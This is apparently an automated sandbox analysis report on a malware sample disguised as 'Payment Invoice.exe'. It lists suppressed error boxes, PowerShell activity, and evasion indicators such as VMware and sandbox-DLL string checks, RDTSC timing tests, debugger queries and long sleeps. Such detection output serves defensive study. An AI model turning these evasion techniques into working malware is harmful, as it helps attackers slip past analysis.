Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Payment Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Payment Invoice.exe, 00000001.00000002.720684926.0000000002A45000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLLDSELECT * FROM WIN32_COMPUTERSYSTEM

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe	RDTSC instruction interceptor: First address: 0000000002E398E4 second address: 0000000002E398EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\WWAHost.exe	RDTSC instruction interceptor: First address: 0000000002E39B4E second address: 0000000002E39B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe

Code function: 14_2_00409A80 rdtsc

14_2_00409A80

Source: C:\Users\user\Desktop\Payment Invoice.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4558			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1897			Jump to behavior

Source: C:\Users\user\Desktop\Payment Invoice.exe TID: 6904	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6952	Thread sleep count: 4558 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6944	Thread sleep count: 1897 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6924	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6740	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1568	Thread sleep time: -36000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WWAHost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Payment Invoice.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: powershell.exe, 0000000B.00000003.814222744.0000000005741000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: explorer.exe, 0000000F.00000002.921338058.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 0000000F.00000000.757463249.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Payment Invoice.exe, 00000001.00000002.720684926.0000000002A45000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: powershell.exe, 0000000B.00000003.814222744.0000000005741000.00000004.00000001.sdmp	Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: explorer.exe, 0000000F.00000002.921899750.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000000.757463249.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000F.00000000.745694978.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 0000000F.00000000.746093620.0000000004791000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATA~
Source: explorer.exe, 0000000F.00000002.921338058.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000000F.00000000.757724788.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 0000000F.00000002.921338058.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000000F.00000000.757724788.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 0000000F.00000002.921338058.00000000058C0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\Payment Invoice.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe

Code function: 14_2_00409A80 rdtsc

14_2_00409A80

Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe

Code function: 14_2_0040ACC0 LdrLoadDll,

14_2_0040ACC0

Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016CC962 mov eax, dword ptr fs:[00000030h]	14_2_016CC962
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016CB171 mov eax, dword ptr fs:[00000030h]	14_2_016CB171
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016CB171 mov eax, dword ptr fs:[00000030h]	14_2_016CB171
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016EB944 mov eax, dword ptr fs:[00000030h]	14_2_016EB944
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016EB944 mov eax, dword ptr fs:[00000030h]	14_2_016EB944
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016E4120 mov eax, dword ptr fs:[00000030h]	14_2_016E4120
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016E4120 mov eax, dword ptr fs:[00000030h]	14_2_016E4120
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016E4120 mov eax, dword ptr fs:[00000030h]	14_2_016E4120
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016E4120 mov eax, dword ptr fs:[00000030h]	14_2_016E4120
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016E4120 mov ecx, dword ptr fs:[00000030h]	14_2_016E4120
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F513A mov eax, dword ptr fs:[00000030h]	14_2_016F513A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F513A mov eax, dword ptr fs:[00000030h]	14_2_016F513A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C9100 mov eax, dword ptr fs:[00000030h]	14_2_016C9100
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C9100 mov eax, dword ptr fs:[00000030h]	14_2_016C9100
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016C9100 mov eax, dword ptr fs:[00000030h]	14_2_016C9100
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016CB1E1 mov eax, dword ptr fs:[00000030h]	14_2_016CB1E1
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016CB1E1 mov eax, dword ptr fs:[00000030h]	14_2_016CB1E1
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016CB1E1 mov eax, dword ptr fs:[00000030h]	14_2_016CB1E1
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017541E8 mov eax, dword ptr fs:[00000030h]	14_2_017541E8
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017451BE mov eax, dword ptr fs:[00000030h]	14_2_017451BE
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017451BE mov eax, dword ptr fs:[00000030h]	14_2_017451BE
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017451BE mov eax, dword ptr fs:[00000030h]	14_2_017451BE
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017451BE mov eax, dword ptr fs:[00000030h]	14_2_017451BE
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F61A0 mov eax, dword ptr fs:[00000030h]	14_2_016F61A0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_016F61A0 mov eax, dword ptr fs:[00000030h]	14_2_016F61A0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017469A6 mov eax, dword ptr fs:[00000030h]	14_2_017469A6
